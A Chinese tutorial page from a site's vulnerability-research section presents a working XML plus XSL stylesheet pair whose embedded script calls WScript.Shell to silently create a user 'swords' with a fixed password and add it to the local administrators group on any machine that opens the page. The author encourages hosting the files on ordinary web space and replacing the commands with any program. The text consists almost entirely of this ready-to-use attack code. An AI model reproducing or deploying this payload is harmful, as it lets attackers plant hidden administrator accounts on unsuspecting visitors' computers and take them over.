手机
当前位置:查字典教程网 >实用技巧 >漏洞研究 >利用xml+xsl给客户机添加超级管理帐户!
利用xml+xsl给客户机添加超级管理帐户!
摘要:用法:把swords.xml和swords.xsl放在一个普通空间,相信很少人会注意xml的安全性吧,嘎嘎,只要把你想运行的程序添加到run...

用法:把swords.xml和swords.xsl放在一个普通空间,相信很少人会注意xml的安全性吧,嘎嘎,只要把你想运行的程序添加到run() 即可,默认支持js和vbs.

这个程序加了一个用户为 swords,密码为est的超级管理员账号。

swords.xml

<?xml version="1.0" encoding="GB2312"?>

<?xml-stylesheet type="text/xsl" href="swords.xsl"?>

<name>I am swords,I am admin!</name>

swords.xsl

<?xml version="1.0" encoding="gb2312"?>

<xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl">

<xsl:template match="/">

<html>

<body>

<xsl:value-of select="name" />

<xsl:script>

function run()

{

var wsh;

var wsh = new ActiveXObject("WScript.Shell");

wsh.run( "net user swords est /add",0);

wsh.run( "net localgroup administrators swords /add",0);

wsh.run( "cmd.exe /c echo test!");

}

</xsl:script>

<xsl:eval>run()</xsl:eval>

</body>

</html>

</xsl:template>

</xsl:stylesheet>

【利用xml+xsl给客户机添加超级管理帐户!】相关文章:

云网在线支付漏洞初探(图)

木马静态变动态 DLL木马程序大揭秘

利用BBSxp后台的缺陷得到webshell

再探九酷网络个人主页空间管理系统

AngelShell:让所有正向程序实现反向连接(应用篇)

黑客之门的魅力:感染与加载(图)

UPDATE注射(mysql+php)的两个模式

对Serv-U 6.0.0.2默认帐户及密码的一点理解

一个意想不到的注入点发现过程

UBB的跨站脚本攻击的漏洞

精品推荐
分类导航